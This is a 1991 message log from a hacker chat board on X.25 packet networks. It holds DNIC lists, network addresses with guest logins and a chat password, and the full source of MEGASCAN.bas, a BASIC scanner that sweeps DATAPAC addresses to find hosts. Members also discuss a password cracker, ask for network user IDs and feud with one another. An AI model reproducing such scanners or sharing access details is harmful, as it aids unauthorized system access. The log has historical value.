Bulgaria ! BULPAC 2841 ! Chile ! E-COM 7302 (very interesting) ! CHILEPAC 7303 ! TOMNET 7305 ! China ! PKTELKOM 4600 ! China ! PACNET 4872 (Taiwan) ! PACNETII 4873 ! UDAS 4877 ! Costa Rica ! RACSAPAC 7122 ! RACSP C 7128 ! RACSAPAC 7129 ! Curacao ! UDTS 3620 ! Denmark ! DATEX 2381 ! DATAPAK 2382 ! DATAPAK 2383 ! Dominicanic ! UDTS 3700 Republic ! ! Ivory-Coast ! SYTRANPAC 6122 ! Finnland ! DATEX 2441 ! DATAPAK 2442 ! DIGIPAK 2443 ! France ! TRANSPAC 2080 ! NTI 2081 ! VX32 2089 ! TRANSPAC 842A ! TRANSPAC 933A ! French ! TRANSPAC 2080 Antilles ! ! French ! TRANSPAC 2080 Guayana ! ! French ! TOMPAC-PF 5470 Polynesia ! ! Gabon ! GABONPAC 6282 ! Greece ! HELPAK 2022 ! HELLASPAC 2023 ! Greenland ! KANUPAK 2901 ! Great Brit. ! BTI IPSS 2341 ! BT PSS 2342 ! Mercury 2350 ! HT 2352 ! Guam ! PACNET 5351 ! Guadeloupe ! TRANSPAC 2080 ! Guatemala ! GUATEL 704A ! Honduras ! HONDUTEL 7080 ! Honkong ! INTELPAK 4542 ! DAS 4544 ! DATAPAK 4545 ! Hungary ! DATEX-L 2160 ! India ! GPSS 4042 ! Indonesia ! SKDP 5101 ! Ireland ! EIRPAC 2724 ! Island ! ICEPAK 2740 (Pack-Ice) ! Israel ! ISRANET 4251 ! Italy ! ITAPAC 2222 ! ITAPAC 2227 ! Jamaica ! JAMANTEL 3380 ! Japan ! DDX-P 4401 ! VENUS-P 4408 ! Jugoslavia ! YUPAC 2201 ! Kaimanisl. ! ???? 3463 ! Cameroon ! CAMPAC 6242 (weally weally weird) ! Canada ! DATAPAC 3020 ! GLOBEDAT-P 3025 ! INFOGRAM 3028 ! INFOSWITCH 3029 ! Columbia ! COLDAPACQ 7320 (Not COKENET 8-) ) ! Korea ! DACOMNET 4501 ! Cuba ! KUPAC 368A ! Kuwait ! via Bah. 427A ! Lebanon ! CEDARPAC 4155 ! Luxemburg ! LUXPAC 2704 ! LUXPAC 2709 ! Malaysia ! MAYPAC 5021 ! Malta ! MALTAPAC 2782 ! Morocco ! ???? 604A ! Martinique ! TRANSPAC 2782 ! Mauritius ! MAURIDATA 6170 ! Mexico ! TELEPAC 3340 ! Namibia ! SWANET 6490 ! New Caledon.! TOMPAC-NC 5460 ! Newzealand ! PACNET 5301 ! Netherlands ! DATANET1 2040 ! DATANET1 2041 ! DATANET1 2049 ! Norway ! DATAPAK 2422 ! RADAUS 2329 ! Panama ! INTELPAQ 7141 ! Papua-New- ! PNGPAC 5053 Guinea ! ! Peru ! ENTEL 716A ! Phillipenis ! DATANET 5151 ! WORLDNET 5152 ! GMCR 5154 ! EASTNET 5156 ! Portugal ! TELEPAC-P 2680 ! Puerto Rico ! UDTS 3300 ! Reunion ! TRANSPAC 2080 ! San Marino ! X-NET 2922 ! Saudi-Arabia! via Bah. 420A ! Sweden ! DATEX 2401 ! DATAPAK 2402 ! DATAPAK 2403 ! Switzerland ! TELEPAC 2284 ! Senegal ! SENPAC 6081 ! Singapor ! TELEPAC 5252 ! Spain ! NID 2141 !` ! IBERPAC 2145 South-Africa! SAPONET-P 6550 ! SAPOPAC 6559 ! Thailand ! IDARC 520A ! Trinidad & ! TEXTEL 3740 Tobago ! DATANET 3745 ! Turkey ! TURPAC 2862 ! Tunesia ! RED25 6050 ! USSR ! IASNET 2502 ! Uruguay ! URUPAC 7482 ! Vanuatu ! VIAPAC 5410 ! Venezuela ! PDVSA-P 734A -------------------------------- That's about all I know. It may not be complete, but nearly. Ican't tell u, if all of them work, coz it depends from which network u dial in. ___________ / __ \__/auloise ========================= Message 92 From anduril at 18:58:42 on Tue Jun 25 Subject: DNICS again .. Austria is missing ! The DNIC of Datex-P is 02322 /Anduril ========================= Message 93 From galileo at 02:47:32 on Wed Jun 26 Subject: THANKS (Dnics) Just a big thank you to Gauloise, Midnite and Anduril for the helpful Dnic lists. Gali ========================= Message 94 From mayhem at 14:31:30 on Wed Jun 26 Subject: hackbase The hackbase at the VAX/VMS Node: LINA is back up. Adress: 22222800173 Login: GUEST Just type @hackbase for instant access. Dont abuse this system folks, its a great place to trade files. -Mayhem- Cliff Burton ========================= Message 97 From galileo at 05:07:37 on Fri Jun 28 Subject: @hackbase WELL, THAT SEEMS TO BE FUCKED TOO. ========================= Message 99 From midas at 17:14:35 on Fri Jun 28 Subject: DYNAPAC MULTIPADS this has existed for about 4 years now.. 505233222006 it declares itself to be a dynapac: multipad.25 and then hangs I small reward for anyone who can pad out from here, but any assistance appreciated ! midas ========================= Message 100 From cyclopz at 21:20:10 on Fri Jun 28 Subject: 800#'s How about Puttin Up some 800 #;s fer network services like datapac,tymnet,telenet...etc...etc... they would be greatly appreciated Now ill go back ta sleep... CyClopz!... ========================= Message 101 From spirit at 00:25:10 on Sat Jun 29 Subject: Unix Hey if any of you Unix hackers out there can send me some source code or just some general information about accessing kernel data structures, it woul d be appreciated. I have messed with this in a limited sense, I am just lookingferent techniques a nd ideas. Thanks, So. ========================= Message 102 From blammo at 01:32:18 on Sat Jun 29 Subject: stuff cyclopz- just go to each network's info section for a list of dialups. use "information" on tymnet, "c mail" phones/phones on telenet, or you can call merit (313 40 off autonet, type "c merit") and enter "help" at the "which host?" prompt. merit has all dialups for sprintnet (telenet), datapac, autonet, mibell (michigan bell), and i think a few other networks.. so- "unix programmer's reference" by john valley (que books) has a decent section on unix kernal. if you have any questions i'll poke around an (er..and) see what i can find for you..but i don't know much about the kernal myself, so i don't know if i can help..but check out the book if you find it.. -midnite ========================= Message 103 From silent at 03:44:37 on Sat Jun 29 Subject: 800s 1-800-222-0555---Tymnet ========================= Message 104 From feoh at 10:33:36 on Sat Jun 29 Subject: translation No guarantees. (french is rusty) but I wanted to try anyway: Type AIDE for a list of classes 2:Attention: the pacx will be down 26 june from 19:00 to 24:00 hrs I think thats basically it. hope it helps ========================= Message 105 From feoh at 10:51:00 on Sat Jun 29 Subject: Mailing MIT Good idea gand, exept that you might mention to mail to request'(@gnu rather tha n root because root could be the WRONG ppl whereas request ARE the right ppl. ========================= Message 106 From midas at 16:07:31 on Sat Jun 29 Subject: EDSNET Anyone have any clues on EDSNET by Electronic Data Systems ?? Any help appreciated Midas ========================= Message 107 From spirit at 22:30:51 on Sat Jun 29 Subject: EDS is a large company in Dallas, TX. They handle parts & desigs for General Motors. I imagine that'd require a pretty large computer net. Sorry dunno anything about EDSNET itself. So. ========================= Message 108 From hstreet at 20:07:40 on Sun Jun 30 Subject: Hey! Elite HackBase Deleter has now changed his name to... The Elite HackBase Terroist! i will make your hackbase a living hell! by using my superior skills to demolish your hard work and exposing you for the lamers you are and keeping you ignorant so that you are docile and easy to Control! ========================= Message 109 From galileo at 03:08:53 on Mon Jul 1 Subject: Hackbase Just set protection to no-delete to all, including system and he's well and truly fucked. If you plan to put it back up, let me know. ========================= Message 110 From cyclopz at 05:00:51 on Mon Jul 1 Subject: Hackbas Terrorsit He Calls Himself the ELITE HACKBASE TERRORIST! But You Can Call Him, Code Of Honor, Or Coh Or Cocksucker! Yes, You guessed it, CODE OF HONOR is the Hackbase Deleter.. More Information soon......Haha....Elite? I doubt it, terrorist definitely...THE END IS NEAR.... ========================= Message 111 From midas at 12:01:40 on Mon Jul 1 Subject: edsnet No, the system is DESIGNED by EDS.. The actual system is in australia... (a ban k) ========================= Message 112 From midas at 12:06:34 on Mon Jul 1 Subject: hackbase... Here I am, fresh from AUSTRALIA (know where that is, Mr Elite ??) and a little out of touch with world hacking , and what crap do i see? 'ELITE HACKBASE TERRORIST' ????????? childish mIDASmAN ========================= Message 113 From orpheus at 20:19:31 on Mon Jul 1 Subject: 2600 meetin could sum1 tell me where the citicorp bld. is in ny so i caan get 2 the meetin. (like whut streets it on) thank u ========================= Message 114 From hstreet at 23:50:44 on Mon Jul 1 Subject: hello! Comsec Computer Securty Corporation. ----------------------------- A company formed by 1 ex-lod member and 2 of hs frends to detroy hackers to inform and secure system and catch hackers. Erik bloodaxe,Doc holiday and Malefactor the compnay is n 60 braeswood sq houston , tx 713-721-6500 / 713-683-5742 remember they are ex-hackers and they want to destroy and catch YOU! call them and see what s up. ========================= Message 119 From mayhem at 12:58:02 on Wed Jul 3 Subject: get_a_life! Hackbase Terrorist? And he says that we're lame (chuckle).. it probably took him much longer to figure out how to delete those files than it will take for me to upload them again. ( I backed them up because I had a feeling MOD would do something this immature) Hackbase would be up already, but the #$%@#$'n sysop is out to lunch, and hasnt created my account yet.. its been a week. Anyways, I'm sure he has much more pressing matters than to give out guest accounts.. -mayhem- ps. hstreet: read the subject, and heed it! ========================= Message 120 From mayhem at 13:28:26 on Wed Jul 3 Subject: MEGASCAN.bas * MegaScan Version 1.0 ** For DATAPAC only By Mayhem (Midnite Society) DISCLAIMER: I have only written this program as an example. If you use it I cannot be held responsible. If you dont agree with this dont download and/or run it. This is formatted for systems with only 80 column capability. Delete all the ~ characters, and make the lines continuous WITHOUT carriage returns. -mayhem- [email protected] ------------ CUT HERE --------------------------------------------------------- 1 HFILE$="C:\path\filename.ext" :REM File path\name session is logged to 2 DDIAL$="ATS=0E1Q0V1X4 DT 555-1234" :REM INIT string + DATAPAC dialup 3 SPEED=1200 :REM Set your desired speed 300-9600 baud 4 COMPORT=1 :REM Set your desired COM:port 1-4 5 TIME1=900 :REM Waits TIME1 then ^P CLR's the Connection (if there is one) 6 TIME2=200 :REM Waits TIME2 before sending a new NUA 7 REM 8 REM *** MODIFY lines 1,2,3,4,5 and 6 for your system. * 9 REM 10 HACKLOG=1:CLOSE:SCREEN 0:WIDTH 80:CLS:KEY OFF:GOSUB 99:LOCATE 1,1:PRINT "MEG~ ~A DATAPAC NUA Scanner V1.0":PRINT "By Mayhem (MSU)" 20 O$="com"+right$(str$(comport),1)+":"+STR$(SPEED)+",n,8,1,CD,DS,RS,CS":OPEN O~ ~$ AS #1:OPEN HFILE$ FOR OUTPUT AS #2:PRINT #1,"AT" 30 ON COM(comport) GOSUB 95 40 COM(comport) ON 50 A$=INKEY$:IF A$="" THEN 50 55 A=ASC(A$) 60 IF A=26 THEN PRINT #1,DDIAL$:GOTO 50 70 IF A=24 THEN GOTO 100 90 PRINT #1,A$;:GOTO 50 95 ALL=LOC(1):IF ALL<1 THEN RETURN 96 B$=INPUT$(ALL,#1):PRINT B$;:IF HACKLOG THEN PRINT #2,B$; 97 RETURN 99 LOCATE 25,2:PRINT "-=<< MEGASCAN by Mayhem >>=- CTRL-Z dials & CTRL-X st~ ~arts scan":RETURN 100 GOSUB 200:INPUT "ENTER PREFIX ";P$:IF P$="" THEN BEEP:PRINT:PRINT " NOTH~ ~ING ??? I hope you're planning on ABORTING! :)" 110 PRINT:INPUT "ENTER SUFFIX ";S 120 A=ASC(INKEY$+CHR$(0)):O$=P$+RIGHT$(STR$(S),LEN(STR$(S))-1):IF A=24 THEN A=0~ ~:FOR L=1 TO 500:A$=INKEY$:NEXT:PRINT:BEEP:PRINT " SCAN ABORTED ":PRINT:PRI~ ~NT"ONLINE:":GOTO 50 ELSE IF A=1 THEN CLOSE:PRINT:BEEP:PRINT" Finishing *":~ ~CLOSE:END 130 PRINT #1,O$:PRINT #2,O$:PRINT O$ 150 FOR L=1 TO TIME110:NEXT:HACKLOG=0:PRINT #1,CHR$(16);"clr" 155 A=ASC(INKEY$+CHR$(0)):IF A=24 THEN A=0:FOR L=1 TO 500:A$=INKEY$:NEXT:PRINT:~ ~BEEP:PRINT " SCAN ABORTED ":PRINT:PRINT "ONLINE:": GOTO 50 ELSE IF A=1 THE~ ~N CLOSE:PRINT:BEEP:PRINT" Finishing ":CLOSE:END 160 FOR L=1 TO TIME210:NEXT:S=S+1:HACKLOG=1:GOTO 120 200 PRINT:PRINT" OK. You must enter a PREFIX and a SUFFIX. The PREFIX+SUFFIX co~ ~mbo 205 PRINT" will be the starting adress. Basicly, the PREFIX is stored as a STRI~ ~NG" 210 PRINT" and the SUFFIX is a number, which is incremented. The suffix CANNOT~ ~* " 220 PRINT" be larger than 7 digits, and must begin with a non-zero digit." 230 PRINT:PRINT" TWO EXAMPLES:" 260 PRINT:PRINT" To start at 13106001158 = PREFIX 1310 SUFFIX 6001158 " 270 PRINT" To start at 1311041500001 = PREFIX 1311041 SUFFIX 500001" 280 PRINT:PRINT" The suffix is incremented with each try, but, will start spewi~ ~ng" 300 PRINT" out exponentials if it goes over 7 digits in length." 310 PRINT:PRINT" CTRL-X ABORTS scan. CTRL-A FINISHES scan, closes file and ENDs" 320 PRINT:RETURN ------------ CUT HERE --------------------------------------------------------- ========================= Message 124 From mayhem at 14:09:59 on Wed Jul 3 Subject: MEGASCAN.doc MegaScan Version 1.0 For DATAPAC only By Mayhem (Midnite Society) DISCLAIMER: I have only written this program as an example. If you use it I cannot be held responsible. If you dont agree with this dont download and/or run it. The program is written for IBM's GWBASIC and, I dont know how compatible the COMPORT and FILE i/o is with other types of BASICs, though it should work on QuickBasic and other basic compilers of that nature, and wont work on BASICA. This program's speed (9600baud maximum?) is available thanks to the ON COM(1) GOSUB xxxx routine which automatically interrupts and jumps to a subroutine if there is incoming data in the serial buffer. When starting up, list the first 9 lines and modify them to your system's specs in line-mode or using your favorite text editor. Everything is pretty straight forward, except for the TIME1 and TIME2 variables which will be discussed later on. The first entry is HFILE$="C:\path\filename.ext". This is the LOG file th at the session will be logged to. Just change the entry to whatever you want. The next entry is DDIAL$="ATS0=0E1Q0V1X4 DT 555-1234". This is the modem initialization string and the dial string, all in one. Just change the commands and/or the 555-1234 to the number of your desired DATAPAC dialup. Modify the SPEED=xxxx entry to your desired baud rate. Modify the COMPORT=x entry to your desired COMx: port I'm too lazy to make entries for changing parity & stop bits etc. The default settings are, of course 8 databits, no parity. If you must modify that stuff, change the 8 N 1 in the line #20: right here \| \| \| 20 O$="com"+right$(str$(comport),1)+":"+STR$(SPEED)+",n,8,1,CD,DS,RS,CS":OPEN O~ If you cant do this yourself, you're beyond help :) Now, TERM1 and TERM2 are variables used in the time delay FOR NEXT loops. This was written on a turbo-pc running at 6.5mhz. If you're on a 286/386 your gonna have to make some drastic changes to these entries. TERM1: the length of time it waits after sending the NUA. Once done the programs transmits a CTRL-P CLR sequence, so, if it has connected, this will disconnect it, and move on. TERM2: the length of time it waits after sending the clear sequence. then, it just loops back and sends the next NUA. Just try different numbers. TERM1=900 TERM2=200 works fine for my PC. A 386sx however would need maybe 27000 and 6000 respectively. The baud rate you're at also will be a deciding factor. The adress entry routine PREFIX+SUFFIX is pretty hairy, but I'm sure you'll get the picture from the examples provided here and on the program. This program could be used to scan for PCP outdials. If I needed the outdial for Atlanta Georgia AC=404, I could use: PREFIX: 1311040 SUFFIX: 400001 Which would give me a starting adress of 311040400001. Then I could come back later, once its up to 311040400200 or more, close the file and END with CTRL-A, then type SYSTEM to exit gwbasic, and then look at the log_file with a text editor, or even use a ms-dos GREP program to weed out useful lines. If you need help with anything, leave me e-mail here. or usenet mail to: [email protected] Enjoy! Brought to u by Mayhem (Cliff Burton) ========================= Message 125 From gauloise at 16:19:44 on Wed Jul 3 Subject: Slovenia Hi folks, I just talked to a guy called STANE on LINA. He is a programmer in Maribor,Slovenia and asked me to forward his mail to all the people I know. Please do the same. Give it, e-mail it through n e net u can think of, because slovenia is beng killed by yugoslavian army. Please excuse hi poor english but I am sure you will get the meaning. If n e 1 of you knows n e nuas in Yugoslavia, tell me. We should try to destract the informationflow in yugoslavia in order to support the freedom forces of slovenia. ok guys i count on you. SEND THIS MAIL TO NE1 YOU KNOW. THERE IS MORE TO COME. read #1 3-JUL-1991 13:55:30.21 MAIL From: PSI%ITAPAC.022016210020131::STANE "Stane Bo`i~" To: PSI%622222800173::GAULOISE CC: Subj: Only some hints about situation in YU, about war in Slovenia Hello my friends! I'm listening to the radio again and hear that army still don't respect armistice. They're still attacking on some places of Slovenia instead of four items, accepted yesterday on meeting with federation president Mesic and federation government member of Macedonia Tuporkovski. Today since 10:00 am, red cross will deliver food and sanitary with helicopters. Our TV will record all material exchanging if it'll be possible. We still don't believe because people with red cross sign on their body was shutting on civil people when they came with helicopters to deliver food. Press RETURN for more... MAIL> #1 3-JUL-1991 13:55:30.21 MAIL Army still didn't answer on four items, we accepted yesterday. It seems that they won't answer on anything. General Adzic said on TV of Belgrade that Slovenia must suffer because we attacked them and fought cruel fight against army which wanted only peace and to do a job, which was ordered from main command center. Today, instead of agreement, 180 tanks (yes 180!!) started to drive from Belgrade to Zagreb. They divided already in three groups for three directions. In Slovenia is right now about 500 tanks. Many of them are destroyed, some of them are still in barracks and wait for order to attack. Army is still trying to keep its authority in YU. Army is playing dirty political games because of its existence. This army is multi-national and everywhere they will attack, it will be an attack on native people. Yesterday they destroyed many town in Slovenia, they killed many civil people and many soldiers. They attacked many of TV and radio antennas to get fuly information blocade. Press RETURN for more... MAIL> #1 3-JUL-1991 13:55:30.21 MAIL Now we agree that all troops will return in their barracks but they don't do that. Opposite! They're trying to continue straight on. General Adzic and other generals reactions including their emotionals. Don't understand me wrong. This emotionals are attached to their army, because in these days we were using words: YU occupation army, etc. General Adzic sent a letter to our government in Ljubljana (Lubiana) and it was written that army will send specialists to pull them from badger's lair and.... Remember that in case if we did let army to establish full control on our borders, it won't be solution for all problems, it won't avoid human sacrifices. We discovered secret plans of army and these plans are really horrible. They planned to establish new government here, to protect from division of YU BUT in these 'wishes' they were able to 'suffocate' any democration, any resistance of people here. In case of resistance they already have prepared another part of plan. Shortly described: destroy all you see. And today they do that. They really didn't expect so hard resistance. Press RETURN for more... MAIL> #1 3-JUL-1991 13:55:30.21 MAIL In moment when I'm writing this mail, I'm listening to the radio and it is reporting that army is still attacking and lead its troops into destroying and killing. Army still don't respect agreement. Our Territory Defence are trying all the time to defend our democracy. Yesterday, Serbians finally recognized that TV, radio and army was lieng them. They were demonstrating in assembly there and asking to return their boys back to home. Boys's age is 18, 19, 20. I know, how is going life in barracks. I was in army last year. Many of them died and will die because officiers shut them in case of desertation. There is still cca 3000 slovenians and thousands of other nations. Who will survive and come back? This is our question, this is question of mothers and fathers in whole Yugoslavia. Is the freedom and democracy really so expensive? Well, I wrote you just a very small peace of all things, are happening here. Press RETURN for more... MAIL> #1 3-JUL-1991 13:55:30.21 MAIL Today we started another mobilization. Soldiers are tired and must be replaced. Maybe I should go too. We'll see. Please, report all your friends there about situation here. This is a true. Stane Bozic from Maribor city (Slovenia) MAIL> ========================= Message 126 From bliss at 00:34:08 on Thu Jul 4 Subject: shit... People with Red Cross's on them shooting people, that sux... Not that this compares with the above news, but does anybody know the reason for dynapacs going down earlier today? Its back up now... ========================= Message 127 From paragon at 11:45:08 on Thu Jul 4 Subject: AFROchat!!! ___ __ ___ _________ _________ __ ___ _________ ___________ / /\/ \ / /\/ ______/\/ ___ /\/ \ / /\/ ______/\/___ ____/\ / / / \/ / / /_____ \/ /\ / / / \/ / / /_____ \ \ / /\ \ \ / / / / / ______/\/ / / / / / / ______/\_\/\/ / \___\/ / / / /\ / / /\ \/ /__/ / / /\ / / /_____ \ \ / / / /__/ /__/ \__/ /__/ \____/________/ /__/ \__/ /________/\_\/ /__/ / \ \ \ \ /\ \ \ \ / \ \ \ \ /\ \ \ \ \ \ \ / \__\/\__\/ \_\/\__\/ \________\/\__\/ \_\/\________\/ \__\/ Brought To You By: A. F. R. O. Internet Address: 130.212.010.102, Port 10069 Password: "efil4srekcah" for you lamers NON-LOGGED - PHYSICALLY IMPOSSIBLE TO LOG ========================= Message 128 From paragon at 13:10:24 on Thu Jul 4 Subject: corret inet address INFONET is at 130.212.10.102, NOT 130.212.010.102 (the latter fucks up) ========================= Message 129 From heartz at 21:59:05 on Thu Jul 4 Subject: happy Independence Day everyone. h. ========================= Message 130 From djockey at 04:04:33 on Fri Jul 5 Subject: HACKBASE!!! (MY) HackBase on Node Lina will soon be updated. (Hooray...) Any suggestions, contact me here or on my VMB (800-326-1040, when answered, dial 93005 in touchtones.) Later, Disk Jockey/WR! ========================= Message 132 From einstein at 21:05:53 on Fri Jul 5 Subject: HP 48sx Heya boys!! Does anybody are a user of Hp 48sx?? What? You don't know what is Hp 48sx?? Well it's a great scientific calculator with programmable possibilities.. Well, I have some stuff for it and I want to know if anyone of you guys are an Hp 48 user ,because it will be great to trade our programs,games, and tricks for this fantastic calc. write to [email protected] thanks bye!!!! P.S. To proove that it's fantastic I want to tell you just that.... this connection is made with it...I've called Itapac -lutzifer with my calc connected to a modem. hehehehehe.... ========================= Message 134 From mayhem at 11:08:09 on Sat Jul 6 Subject: KillerCrack6.0 KC 6.0 is out now.. who wants a copy? :) -mayhem- ========================= Message 135 From blammo at 23:50:47 on Sat Jul 6 Subject: 3KC6 what it is? ========================= Message 136 From cyclopz at 00:21:41 on Sun Jul 7 Subject: Trtsvc/Hackbase Hey, I have an IDEA!!! STOP Calling QSD you lamers! For those of you afflicted with QSD Jiotters i have a solution use trtsvc(NUI No p[w) to call Node lINA it has a better chat and as soon as someone fix's up hackbase it'll have File Transfers! As an added Bonus its :Like LUTZIFER!! the NUA is on here somewhere or if yer dumb, its 22222800173 use uit! Latre DOWN WITH QSD! FOREVERRR! CyClopz!...The Infamous ========================= Message 137 From spirit at 05:54:10 on Mon Jul 8 Subject: KC6 Killer Cracker 6.0 standard is a passwd cracker by Doc Dissector of (at one time anyways) PHA. He also wrote NUAA and some other utilities. Anyhow, KC6 will run on just about anything, you just give it a passwd file and a wordlist, it'll guess away. Comes with source. So. ========================= Message 138 From sirus at 06:49:34 on Mon Jul 8 Subject: dictionary? Does anybody have another wordlist other than the two found with killer cracker? ========================= Message 139 From hstreet at 15:07:48 on Mon Jul 8 Subject: heh well kill cracker is bullshit it is for lamers who can't write thier own password cracker. and afrochat is gone..forever. and will be crushed where ever it goes probably threw rewt access. /s ========================= Message 140 From blammo at 19:03:07 on Mon Jul 8 Subject: things blah...afrochat sucked anyway.. cyclopz- it seems that every NUI posted on here dies within a week, so i doubt trt will last much longer..plus, anyone with half a brain doesn't need to use tymnet NUIs to reach here, so they don't have to worry about how slow dynapac is. ========================= Message 141 From tchhacky at 21:26:15 on Mon Jul 8 Subject: besides the fact that I heard that dynapac was tracing ========================= Message 142 From hstreet at 21:59:59 on Mon Jul 8 Subject: yes! afrochgat did suck..thats why it went down.. oh well..i guess those shitheads that put it up didnt know enough to keep it running not much sense between doctor dissector and repo anyway / ========================= Message 143 From paradox at 23:02:09 on Mon Jul 8 Subject: 'afrochat' I had nothing to do with 'afrochat' nor apc. 'nuff said. - repo ========================= Message 144 From paradox at 23:21:29 on Mon Jul 8 Subject: heh Well actually i did have alot to do with it. i Constantly beg doctor dissector for info and accounts and help him spread everything he gets in order to kill it of fast all i really do is hack boring .edu sites and collect anon ftp sites i am getting up in the years and kinda lame so i have to do something well..i made Afrochat with DD as a petty way to show up some of the MOD members...but i confess..i cant keep up with them. but me and DD will take the reigns as the kings of the hack/phreak world now that they are gone. we will tell smug lies behind thier back and assume lots of evil nasty stuff about them. well dont look at my poser statue..just like me for me. BTW: mail me some cool accounts please? i am kinda low on good shit -repo ========================= Message 145 From blammo at 00:19:06 on Tue Jul 9 Subject: dynapac who cares if dynapac's tracing or buffering or any of those other bullshit rumors. those rumors have spread about every NUI ever in existance, and even some that haven't. as far as i'm concerned, it's all bullshit. but who cares. anyone still using dynapac deserves to be "traced" or whatever. it's a shitty NUI anyway. ========================= Message 146 From lazer at 17:14:08 on Tue Jul 9 Subject: I guess... Afrochat was kinda corny. Hey Blammo, we would all h ave a million ways to get he re if we did it like you did. Don't knock it. Your stepping stone could be stolen. Or go down. Hmmmm, that sure was an interesting post be repo! ========================= Message 147 From private at 01:05:11 on Wed Jul 10 Subject: haha MoD is DEAD... it died with Phiber Optic, don't try to deny that. I did not set Afrochat up, I merely released the program which can enable anyone to set any similar chat up, just because I'm not as egotistical as "MoD" members (or so they say they are! hah!) does not mean I am ignorant! Rather, I challenge these "MoD" members' own words in stating that they are the ignorant, and are the ones who enjoy hacking "boring .edu sites"... if they even knew how to do that!! Show yourself "MoD"... I am not afraid... I am not one to hide my immature face behind the shadows of others or a shield of ignorance like yourselves! I challenge you, you who think yourselves as so "high and allamighty"... you who do all that you state against me in your defense of your own stupidity and idiocy! Prove yourself! Not to all, but to ME if you dare. Perhaps then, the lies and falsehoods stated by your pitiful selves will be respected by even ME whenever you choose to do so. As for me, I am not afraid to share my information, because I do not share in the insecurities of becomming obsolete! I have the ability to grow and expand my own intellect, not confined by the spoon fed information given to your own kind, "MoD"! And you dare call yourself "MoD"... "Masters" of WHAT? you cannot even master your own immaturity or insecurity. Do not look at this message as a retalitory statement against your flames, but look at it as a PUBLIC disclosure of what "MoD" truely is, behind the immaturity and falsehoods created by the "members" of the group, nothing but a group of individuals who cannot adjust to the quickly changing world, either the world of the hack or the world of "reality"; their only hope for survival, to attempt to "prey" upon those who they believe to be more insecure than themselves and perhaps even more ignorant. Unfortunately, they chose the wrong individual to "prey" upon, for now, I shall prey upon "MoD"... hahahaha! And remember, I FEAR NOT your petty attempts to shame me or anyone else, whether they be in my company or not, because I have enough faith in my own intellect, needing not to retaliate against your idiotic remarks, but to expose the long-helf facade behind the "real MoD". Doctor Dissector [email protected] ========================= Message 148 From private at 01:07:36 on Wed Jul 10 Subject: ahah... then again maybe you guys think "ignorance is bliss"... haha... I for one, do not! ========================= Message 149 From tchhacky at 20:20:49 on Wed Jul 10 Subject: A challenge? Me thinks Doctor Dissector understands the old age of hacking ========================= Message 150 From private at 03:54:06 on Thu Jul 11 Subject: But wait a minute... But how do you discern between the old and the new? The "new" appears to be all the MoD wanna-be's and worshipers... now here I come along and renounce MoD for what they really are... and they only turn against me, and flame me, for my mothods of hacking or whatever MoD may care to call it... I don't care! You see, it is MoD who hates and despieses me for being one to share the information I gather and learn, because it is MoD who is afraid of losing their "competitive edge"? Did not "blammo" say that "i constantly beg doctor dissector for info and accounts and help him spread everything he gets in order to kill it off fast"... does this mean that MoD only has a limited resource base, and maybe I am threatening their reign has the only "good" hackers (haha... funny rumor, and well distrubuted, I'll give you guys that much) as I slowly ~rteach those who might not know quite as much the ropes? See, guys, it's obvious you are afraid of losing your, shall I call it, "superiority" over those who worship and oh so modestly cringe in fear from your very name... losing that "competitive edge"... coming down to the world of equality... is that so bad? In your eyes, it is, perhaps because that limited resource base that you feed off of is becomming increasingly dry, as everyone else begins to feed off of it... eventually... you will have nothing ahead or behind all others who previously groveled at your feet. But I will not, because instead of eating out of the same resource base, I shall grow, beyond your own limited capabilites... fear not, MoD, perhaps it will be I, then, who will be teaching YOU, and these words you speak against me will be forgotten..... dd ========================= Message 151 From blammo at 22:12:53 on Thu Jul 11 Subject: whoa.. "blammo" said no such thing. i am not involved with MoD or this little quarrel of yours in any way. i don't care w ho knows what, or who hates who..just keep me out of it! (how did i get in this anyway?!) -midnite ========================= Message 152 From haywire at 13:28:31 on Fri Jul 12 Subject: Nui Okay then..If DYNAPAC1 is so fucking Lame..Then whats another GOOD NUI? >T.bongb01 host only is fucked..Whats a good Valid Nui?? ========================= Message 153 From tchhacky at 20:40:41 on Fri Jul 12 Subject: nui's do some scanning and find a pad that reaches here through telenet. Its not that hard ========================= Message 154 From haywire at 11:21:55 on Sun Jul 14 Subject: Pads I have a Pad outta Telenet..But Everyone Talks so Highy about damned NUI's so where the hell are they all?? Okay Dynapac1 and T.hongb01 sux whats a GOOD NUI??? or is your thoughts that all Nui's suck?? MOD SUX!! I read some Letters that NSA did and they're Pretty good ..you guys ever read some of their Letters or call their Dist SItes?? ========================= Message 155 From cygnus at 22:53:31 on Mon Jul 15 Subject: isranet Could somebody post up the nua to an isranet gateway? thanx phArmEr ========================= Message 156 From ronnie at 02:25:09 on Tue Jul 16 Subject: pissed ok.. i'm not blaming MoD (or maybe i am.. id ont know) it all depends on who really did it.. somebody called up using my handle on a guest account and was giving out So76's info.. i dont really appreciate it.. #1 it's very VERY chioldish and shows the immaturity and insecurity of some people #2 it show's how stupid some people are and how they try to tear down what people have built for their owwn selfish benefits instead of for the benefit of the whole. #3 all of the above.... I do not and will not use tymnet unless absolutely necessary.. especially if its somethin g that i dont want somebody to get their hands on because the way I see it, certain people are watching and trying to get every chance they can to destroy.. thats not what a real `hacker' is... if you want the definition... i'll be glad to post it for you.. the real definition(s)... as for this group of people who think they are so godly.. they are not `hackers' at all.. they are anarchists... anarchy is immature as said before and NOBODY like anarchist.. even anarchists hate themselves because they are always trying to top each others.. at least hackers try and help one another with useful information and knowledge.... ahh.. this is bull.. i cant speak to them.. they are too stupid to listen to what i have to say.. lateron ronnie ========================= Message 157 From spirit at 06:01:47 on Tue Jul 16 Subject : Anarchists Hmmmm. Ronnie, when u go look up the definition of 'hacker' go back and look up 'anarchist' as well... Me finks you got a bit mixed up there Galileo (From the Home of Omaha) ========================= Message 158 From spirit at 09:09:31 on Tue Jul 16 Subject: erf I see what you are getting at, Gali, but let's not get stuck in semantics. I think we all understand exactly what Ronnie is saying here, and I also believe most of us agree with him. I know how he feels, being impersonated, but add to this that someone was trying to 'frame' him, I can certainly understand his displeasure. So. ========================= Message 159 From gauloise at 21:55:53 on Wed Jul 17 Subject: SUN YO Guys, now i spent 6000 bux on a sun and i ain't got no software N e 1 know about some statistical software for sun staions ? anx gaul ========================= Message 160 From cygnus at 01:36:06 on Thu Jul 18 Subject: anarchists Anarchists is a bad way of describing them if you are going to use a term. I know a lot of anarchists who do go by a set of thier own rules. And that is the difference here, these people who are screwing off are doing it for their ego. Whether it is bad or good. They are fuckin around and pissing everyone off and it is working!! So the best thing to do would be ignore them, they are getting what they want and it is being spoon fed to them. Everyone knows how childish they are so there is no need to go into details 